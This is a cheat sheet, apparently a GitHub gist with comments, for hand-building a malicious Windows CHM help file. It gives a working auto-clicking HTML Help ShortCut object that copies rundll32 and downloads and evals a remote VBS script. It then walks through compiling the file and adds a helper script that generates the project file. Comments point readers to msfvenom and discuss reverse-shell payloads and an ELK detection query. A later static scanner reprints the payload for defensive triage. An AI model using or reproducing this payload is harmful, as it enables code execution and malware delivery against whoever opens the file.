Cheat sheet describing how to create a malicious CHM file by hand (another approach is to use Nishang's Out-CHM script).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within the "docs" directory and insert the following code into its <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c copy /Y C:\Windows\system32\rundll32.exe %TEMP%\out.exe > nul && %TEMP%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8000/test.vbs",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>
  • Step 3: Prepare a Project.hhp file (HTML Help Workshop's project format) with contents like the following:
[OPTIONS]
Contents file=<PATH-TO-UNPACKED-CHM-DIRECTORY>\Table of Contents.hhc
[FILES]
<PATH-TO-UNPACKED-CHM-DIRECTORY>\docs\Malicious-File.htm

Add every file the CHM needs to the [FILES] section, including the HTM file modified in Step 2.

  • Step 4: Compile the project from within the unpacked CHM directory using the hhc.exe compiler:
<PATH-TO-UNPACKED-CHM-DIRECTORY>> "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hhp
Microsoft HTML Help Compiler 4.74.8702

Compiling <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm


Compile time: 0 minutes, 1 second
353     Topics
7,208   Local links
187     Internet links
2       Graphics


Created <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm, 817,791 bytes
Compression decreased file by 2,091,702 bytes.
  • Step 5: PROFIT.
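Step 3 asks for every content file to be listed under [FILES], which is tedious for a help file with hundreds of topics. The following is an added example, not part of the original gist: it walks the unpacked CHM tree, writes the project file with relative paths so it can be compiled from that directory as in Step 4, and refuses to emit a project that omits the entry-point page modified in Step 2. The Compiled file and Default topic keys are standard .hhp [OPTIONS] keys that the page's snippet does not show; the sample tree built by demo() and every path in it are constructed for illustration.

```python
"""Generate the .hhp project file for an unpacked CHM directory (Step 3)."""
from pathlib import Path
import tempfile

# File types that must appear under [FILES] to be compiled into the CHM.
# The .hhc table of contents is referenced from [OPTIONS] instead.
CONTENT_SUFFIXES = {".htm", ".html", ".css", ".js", ".gif", ".jpg", ".jpeg", ".png", ".bmp"}


def list_content_files(unpacked_dir):
    """Return sorted, CHM-relative, Windows-style paths of every content file."""
    root = Path(unpacked_dir)
    return sorted(
        str(p.relative_to(root)).replace("/", "\\")
        for p in root.rglob("*")
        if p.is_file() and p.suffix.lower() in CONTENT_SUFFIXES
    )


def build_hhp(unpacked_dir, entry_point, contents_file="Table of Contents.hhc",
              compiled_name="Project.chm"):
    """Return the text of a project file that compiles unpacked_dir into compiled_name.

    entry_point is the relative path of the modified HTML page (e.g. docs\\Malicious-File.htm);
    it becomes the default topic and must exist in the tree, otherwise hhc.exe would
    happily build a CHM without the page you changed.
    """
    files = list_content_files(unpacked_dir)
    if entry_point not in files:
        raise FileNotFoundError(f"entry point {entry_point!r} not found under {unpacked_dir}")
    lines = [
        "[OPTIONS]",
        f"Compiled file={compiled_name}",
        f"Contents file={contents_file}",
        f"Default topic={entry_point}",
        "",
        "[FILES]",
        *files,
    ]
    return "\n".join(lines) + "\n"


def demo():
    """Build a small constructed CHM tree and return (hhp_text, listed_files)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "docs").mkdir()
        (root / "images").mkdir()
        (root / "Table of Contents.hhc").write_text("<UL></UL>")          # referenced, not listed
        (root / "docs" / "Malicious-File.htm").write_text("<html><body>stub</body></html>")
        (root / "docs" / "intro.htm").write_text("<html><body>intro</body></html>")
        (root / "images" / "logo.gif").write_bytes(b"GIF89a")
        (root / "notes.txt").write_text("not a CHM content type; must not be listed")
        return build_hhp(root, "docs\\Malicious-File.htm"), list_content_files(root)


if __name__ == "__main__":
    print(demo()[0])
```

Write the returned text to Project.hhp in the unpacked directory and run hhc.exe on it exactly as in Step 4.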
@clubby789 commented Oct 6, 2019

Sorry, which part is the bit to be edited to control what's executed? I assume most of the commands are setting it up.

@cyberblackhole commented Nov 22, 2019

Where is the test.vbs file? Can you also post its content? I assume this is incomplete without it.

@mgeeky (Owner Author) commented Nov 26, 2019

This was only a demonstration of where to put your command. You can have any sort of VBS, PS1 or JS script there, really. For the simplest example, generate one yourself using publicly available toolkits such as msfvenom.

@Jackson-Pollock commented May 23, 2021

Could someone please suggest a .chm payload where hh.exe itself makes the network connection (this is a SIEM rule test requirement)? I tried this and Out-CHM.ps1 to create a reverse shell payload with powershell/nc.exe, but that doesn't meet the requirement of a network connection by hh.exe.

This is to meet the following ELK SIEM rule query:

sequence by process.entity_id [process where process.name : "hh.exe" and event.type == "start"] [network where process.name : "hh.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
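The detection discussion above is about process telemetry; the complementary static check is to look inside the CHM itself. In the page's payload the HTTP request to http://127.0.0.1:8000/test.vbs is issued by the rundll32 copy at %TEMP%\out.exe, launched by cmd.exe, which hh.exe started through the ShortCut object, so the network event is two processes below hh.exe rather than on hh.exe itself. The following is an added example, written for this page and not part of the gist or any comment: after unpacking a .chm with 7-zip (Step 1), it scans the .htm files for <OBJECT> tags using the HHCtrl class id from the page with Command=ShortCut, pulls the launched program, its arguments and any URLs out of Item1, and records whether a script auto-clicks the object. SAMPLE_HTML is the page's own payload; BENIGN_HTML (a keyword-link use of the same control) and the directory layout assumed by scan_tree are constructed for illustration.

```python
"""Static triage of unpacked CHM pages for HTML Help ShortCut objects."""
from html.parser import HTMLParser
from pathlib import Path
import re

# Class id of the HTML Help ActiveX control, as used in the page's OBJECT tag.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
URL_RE = re.compile(r"https?://[^\s\"'(),]+", re.I)


class HHCtrlObjectParser(HTMLParser):
    """Collect every HHCtrl <OBJECT> together with its <PARAM> name/value pairs."""

    def __init__(self):
        super().__init__()
        self._current = None
        self.objects = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}          # html.parser lowercases attribute names
        if tag == "object":
            clsid = a.get("classid", "").strip().lower()
            if clsid.startswith("clsid:"):
                clsid = clsid[len("clsid:"):]
            self._current = {"id": a.get("id", ""), "clsid": clsid, "params": {}}
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name", "").strip().lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            if self._current["clsid"] == HHCTRL_CLSID:
                self.objects.append(self._current)
            self._current = None


def scan_html(html):
    """Return one finding per ShortCut object in the HTML text (empty list if none)."""
    parser = HHCtrlObjectParser()
    parser.feed(html)
    parser.close()
    findings = []
    for obj in parser.objects:
        params = obj["params"]
        if params.get("command", "").strip().lower() != "shortcut":
            continue                                   # KLink, ALink, Related Topics... launch nothing
        # Item1 is "window,program,arguments"; the page's payload leaves the window field empty.
        fields = params.get("item1", "").split(",", 2)
        program = fields[1].strip() if len(fields) > 1 else ""
        args = fields[2] if len(fields) > 2 else ""
        # A <SCRIPT> calling <id>.Click() fires the shortcut without user interaction.
        auto_click = bool(obj["id"]) and re.search(
            rf"\b{re.escape(obj['id'])}\s*\.\s*Click\s*\(", html, re.I) is not None
        findings.append({
            "object_id": obj["id"],
            "program": program,
            "arguments": args,
            "urls": URL_RE.findall(args),
            "auto_click": auto_click,
        })
    return findings


def scan_tree(unpacked_dir):
    """Scan every .htm/.html below an unpacked CHM directory; return {path: findings}."""
    results = {}
    for p in Path(unpacked_dir).rglob("*"):
        if p.is_file() and p.suffix.lower() in {".htm", ".html"}:
            hits = scan_html(p.read_text(encoding="utf-8", errors="replace"))
            if hits:
                results[str(p)] = hits
    return results


# The page's payload, verbatim, wrapped in a minimal document (constructed test input).
SAMPLE_HTML = r"""<html><body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c copy /Y C:\Windows\system32\rundll32.exe %TEMP%\out.exe > nul && %TEMP%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8000/test.vbs",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>
</body></html>"""

# Constructed benign use of the same control (keyword link); must not be flagged.
BENIGN_HTML = """<html><body>
<OBJECT id=hhctrl type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
  <PARAM name="Command" value="KLink">
  <PARAM name="Item1" value="">
  <PARAM name="Item2" value="Installing">
</OBJECT>
</body></html>"""
```

Run scan_tree against the directory produced by 7-zip in Step 1; a page that yields a finding with program cmd.exe, an external URL in arguments and auto_click set is the pattern this cheat sheet produces.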